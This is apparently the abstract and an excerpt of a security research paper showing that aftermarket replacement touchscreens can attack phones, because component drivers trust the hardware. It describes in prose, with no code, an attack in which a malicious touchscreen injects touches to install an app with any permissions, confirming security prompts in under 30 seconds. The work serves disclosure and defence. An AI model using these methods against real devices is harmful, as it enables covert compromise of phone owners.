Abstract: Phone touchscreens, and other similar hardware components such as orientation sensors, wireless charging controllers, and NFC readers, are often produced by third-party manufacturers and not by the phone vendors themselves. Third-party driver source code to support these components is integrated into the vendor’s source code. In contrast to “pluggable” drivers, such as USB or network drivers, the component driver’s source code implicitly assumes that the component hardware is authentic and trustworthy. As a result of this trust, very few integrity checks are performed on the communications between the component and the device’s main processor. In this paper, we call this trust into question, considering the fact that touchscreens are often shattered and then replaced with aftermarket components of questionable origin.
The first attack we demonstrate is the malicious software installation attack. As illustrated in the video, this attack installs and starts an app from the Google Play Store. By using Android’s internal search functionality, the attacker can type in the name of the Play Store app instead of searching for it onscreen, making our attack more resilient to users who customize their homescreens. It is important to note that the attack can install an app with arbitrary rights and permissions, since the malicious touchscreen can confirm any security prompt posed by the operating system. This attack takes less than 30 seconds, and can be performed when the phone is unattended and when the screen is powered off.